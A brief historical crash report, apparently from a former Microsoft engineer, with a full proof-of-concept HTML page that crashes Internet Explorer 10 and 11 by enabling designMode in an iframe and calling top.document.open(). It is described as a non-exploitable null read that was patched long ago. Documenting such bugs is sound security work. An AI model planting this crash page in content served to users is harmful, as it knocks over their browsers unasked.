A brief crash report. Enabling designMode in an iFrame and then calling top.document.open() from that iFrame caused a null pointer dereference in MSHTML!CJScript9Holder::ClearHostObjects.

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE10" />
<title>DoS_designMode_documentOpen</title>
</head>
<body>
<iframe width="10" height="10"></iframe>
<script language="JavaScript">
function main()
{
	var iFrameCode =	'myTop = parent;'+
						'document.designMode = "On";'+
						'myTop.alert("Click OK to crash the browser");'+
						'myTop.document.open();';

	window[0].execScript(iFrameCode);
}
</script>
</body>
</html>

The crash was classified as PROBABLY_NOT_EXPLOITABLE — a null-class pointer read in CJScript9Holder::ClearHostObjects+0x51. Enabling designMode in the iFrame and then opening the top-level document’s stream from that context left the JScript9 host objects in an invalid state during teardown. The crash reproduced on both IE10 and IE11.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.